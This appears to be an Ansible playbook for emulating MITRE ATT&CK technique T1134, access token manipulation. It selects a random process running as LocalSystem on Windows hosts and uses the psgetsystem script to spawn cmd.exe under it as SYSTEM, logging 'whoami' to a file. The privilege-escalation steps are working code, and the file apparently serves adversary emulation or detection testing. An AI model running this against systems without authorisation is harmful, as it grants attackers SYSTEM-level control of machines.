# attack_technique: T1134
# Reference: https://github.com/decoder-it/psgetsystem
- name: T1134 - Access Token Manipulation
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Get running random PID running as system
      win_shell: |
        Get-WMIObject -Query "Select ProcessId From Win32_Service WHERE state='Running' and StartName='LocalSystem'" | findstr ProcessId | %{$_.split(':')[1]} | Sort-Object -Unique | Get-Random
      register: systemPID
      
    - set_fact: 
        pid={{ systemPID.stdout }}
      
    - name: Execute elevation powershell script
      win_shell: |
        c:\temp\psgetsys.ps1
        [MyProcess]::CreateProcessFromParent({{ pid }},"cmd.exe \k whoami > c:\temp\t1134.txt")
